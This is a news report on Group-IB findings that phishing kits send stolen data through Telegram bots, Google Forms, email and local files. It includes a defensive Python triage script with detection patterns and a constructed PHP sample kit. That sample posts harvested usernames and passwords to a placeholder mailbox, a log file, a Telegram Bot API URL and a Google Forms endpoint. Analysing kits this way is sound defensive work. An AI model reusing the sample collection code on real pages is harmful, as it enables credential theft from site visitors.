While email remains attackers’ preferred method for exfiltrating information stolen in phishing attacks, security researchers note an increase in alternative methods such as Google Forms or private Telegram bots. These methods may be precursors to a new twist in the evolution of phishing kits.
Researchers at cybersecurity company Group-IB noticed that over the past year, more and more phishing kits include tools that allow collecting stolen user data using Google Forms and Telegram.
Currently, attackers use email in 94% of cases, while alternative methods account for roughly 6% of the phishing kits that Group-IB has analyzed, a share the security company expects to increase in the near future.
The phishing operators’ favorite alternative exfiltration method is storing the stolen data in a local file on the phishing resource itself.
The use of Telegram is not surprising, as this Russian messaging app is anonymous, free, and easy to use. It’s nothing new either: back in 2019, the notorious phishing kit 16Shop exfiltrated all the data stolen from the victims via this messaging service.
A scam-as-a-service operation used by at least 40 cybercriminal gangs also used Telegram bots to show fraudulent web pages to its victims.
Researchers have seen increased use of Google Forms as well. This method involves sending stolen data collected from a phishing site to a Google Form via a POST request to an online form whose link is embedded in the phishing kit.
Compared to email, this is a safer method for exfiltrating the information, since an email service can be blocked or hijacked and the logs lost, Group-IB told BleepingComputer.
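The four channels described above (email, local file, Telegram bot, Google Forms) each leave a recognisable trace either in the kit's source or in the web host's outbound traffic. The following is an added example, not Group-IB's tooling or anything from the article: a small triage script that tags which channel a seized kit uses and flags egress-log lines where a web server reaches the public Telegram Bot API or Google Forms submission endpoint. The kit files, the `<BOT_TOKEN>`/`<FORM_ID>` placeholders and the proxy log lines are all constructed.

```python
"""Triage helper: spot the exfiltration channel used by a phishing kit.

Added example, not Group-IB's code. It scans text (kit source files or
outbound-proxy log lines from a web server) for the four channels the
article names: email, local file, Telegram bot, Google Forms. The URL
shapes are the public Telegram Bot API and Google Forms submission
endpoints; every sample input below is constructed.
"""
import re
from typing import Dict, List, Tuple

CHANNEL_PATTERNS: Dict[str, List[re.Pattern]] = {
    "telegram": [
        # Bot API call shape: https://api.telegram.org/bot<TOKEN>/sendMessage
        re.compile(r"api\.telegram\.org/bot[^/\s\"']+/send\w+", re.I),
    ],
    "google_forms": [
        # Form submission endpoint: .../forms/d/e/<FORM_ID>/formResponse
        re.compile(r"docs\.google\.com/forms/[^\s\"']*formResponse", re.I),
    ],
    "email": [
        re.compile(r"\bmail\s*\(", re.I),      # PHP mail()
        re.compile(r"\bPHPMailer\b"),
    ],
    "local_file": [
        re.compile(r"\bfile_put_contents\s*\(", re.I),
        re.compile(r"\bfopen\s*\([^)]*['\"]a\+?['\"]", re.I),  # append mode
    ],
}

# Hosts a web server process has no business initiating connections to.
EGRESS_HOSTS = {
    "telegram": re.compile(r"\bapi\.telegram\.org\b", re.I),
    "google_forms": re.compile(r"\bdocs\.google\.com\b", re.I),
}


def classify_exfiltration(text: str) -> Dict[str, List[str]]:
    """Map each channel found in `text` to the literal strings that matched."""
    hits: Dict[str, List[str]] = {}
    for channel, patterns in CHANNEL_PATTERNS.items():
        found = [m.group(0) for p in patterns for m in p.finditer(text)]
        if found:
            hits[channel] = found
    return hits


def triage_kit(files: Dict[str, str]) -> Dict[str, List[str]]:
    """Summarise a kit as channel -> list of files that use that channel."""
    summary: Dict[str, List[str]] = {}
    for name, content in files.items():
        for channel in classify_exfiltration(content):
            summary.setdefault(channel, []).append(name)
    return summary


def egress_alerts(log_lines: List[str]) -> List[Tuple[str, str]]:
    """Flag proxy/firewall lines where the web host talks to an exfil endpoint."""
    alerts: List[Tuple[str, str]] = []
    for line in log_lines:
        for channel, host_re in EGRESS_HOSTS.items():
            if host_re.search(line):
                alerts.append((channel, line.strip()))
    return alerts


# Constructed samples: a two-file "kit" and three outbound-proxy log lines.
SAMPLE_KIT = {
    "login.php": (
        '$msg = "user=" . $_POST["u"] . " pass=" . $_POST["p"];\n'
        'mail("collector@example.invalid", "log", $msg);\n'
        'file_put_contents("log.txt", $msg . "\\n", FILE_APPEND);\n'
    ),
    "send.php": (
        '$tg = "https://api.telegram.org/bot<BOT_TOKEN>/sendMessage";\n'
        '$gf = "https://docs.google.com/forms/d/e/<FORM_ID>/formResponse";\n'
        'curl_setopt($ch, CURLOPT_URL, $gf);\n'
    ),
}
SAMPLE_EGRESS_LOG = [
    "2021-01-01T10:00:01Z web01 squid: CONNECT api.telegram.org:443 user=www-data",
    "2021-01-01T10:00:02Z web01 squid: GET http://deb.debian.org/debian/ user=_apt",
    "2021-01-01T10:00:03Z web01 squid: CONNECT docs.google.com:443 user=www-data",
]

if __name__ == "__main__":
    for channel, names in sorted(triage_kit(SAMPLE_KIT).items()):
        print(f"{channel:13s} {', '.join(names)}")
    for channel, line in egress_alerts(SAMPLE_EGRESS_LOG):
        print(f"ALERT [{channel}] {line}")
```

The kit-side patterns are useful when analysing a takedown or a kit found on a compromised host; the egress-side check is the more durable control, since the point the researchers make is that blocking a mailbox does nothing once the kit posts straight to a messaging or forms API, whereas a web server that opens its own connections to those hosts is an anomaly regardless of which kit is involved.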
Analyzing the victims in these campaigns, Group-IB identified more than 260 brands, most of them online services. Thirty percent of them were online tools for viewing documents, online shopping, streaming services, and more; 22.8% were email clients; and 20% were financial organizations. The top individual targets were users of Google, Microsoft, PayPal, and Yahoo products, the researchers say.
A direct consequence of this is the spread of “more complex social engineering used in large-scale attacks,” said Yaroslav Kargalev, Deputy Director of Group-IB’s incident response team (CERT-GIB). Countering it would require blocking the attacker’s entire infrastructure, not just the phishing websites.